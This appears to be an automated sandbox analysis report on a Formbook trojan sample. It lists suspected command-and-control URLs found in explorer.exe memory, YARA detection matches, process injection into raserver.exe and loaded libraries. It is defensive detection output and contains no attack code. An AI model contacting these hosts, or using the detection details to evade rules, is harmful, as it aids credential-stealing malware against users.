              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinklethrive.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinklethrive.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinklethrive.com/gy14/www.ampsportss.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinklethrive.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/www.artbydianayorktownva.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp1.autos
              Source: explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp1.autos/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp1.autosReferer:
              Source: explorer.exe, 00000002.00000000.2066913018.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
              Source: explorer.exe, 00000002.00000000.2073710031.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3309996442.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
              Source: explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
              Source: explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
              Source: explorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings

              E-Banking Fraud

              Source: Yara match, File source: jqPZZhDmjh.exe, type: SAMPLE
              Source: Yara match, File source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: jqPZZhDmjh.exe, type: SAMPLE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: jqPZZhDmjh.exe, type: SAMPLE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: jqPZZhDmjh.exe, type: SAMPLE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.3313647278.000000000DF94000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_772cc62d, Author: unknown
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: jqPZZhDmjh.exe PID: 6964, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR, Matched rule: Semi-Auto-generated - file ironshell.php.txt, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: Process Memory Space: raserver.exe PID: 2656, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 0445F290 appears 105 times
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 043CB970 appears 280 times
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 04427E54 appears 111 times
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 04415130 appears 58 times
              Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 0444EA12 appears 86 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: String function: 0163F290 appears 105 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: String function: 01607E54 appears 109 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: String function: 015AB970 appears 280 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: String function: 015F5130 appears 58 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Code function: String function: 0162EA12 appears 86 times
              Source: jqPZZhDmjh.exe, Static PE information: No import functions for PE file found
              Source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001939000.00000040.10000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameraserver.exej% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000003.2051833702.000000000133A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000002.2119541533.00000000016AD000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001093000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameraserver.exej% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameraserver.exej% vs jqPZZhDmjh.exe
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exe, Section loaded: apphelp.dll
              Source: C:\Windows\explorer.exe, Section loaded: workfoldersshell.dll
              Source: C:\Windows\explorer.exe, Section loaded: windows.cloudstore.schema.shell.dll
              Source: C:\Windows\SysWOW64\raserver.exe, Section loaded: wtsapi32.dll
              Source: C:\Windows\SysWOW64\raserver.exe, Section loaded: samcli.dll
              Source: C:\Windows\SysWOW64\raserver.exe, Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\raserver.exe, Section loaded: wininet.dll
              Source: jqPZZhDmjh.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: jqPZZhDmjh.exe, type: SAMPLE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: jqPZZhDmjh.exe, type: SAMPLE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: jqPZZhDmjh.exe, type: SAMPLE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.3313647278.000000000DF94000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
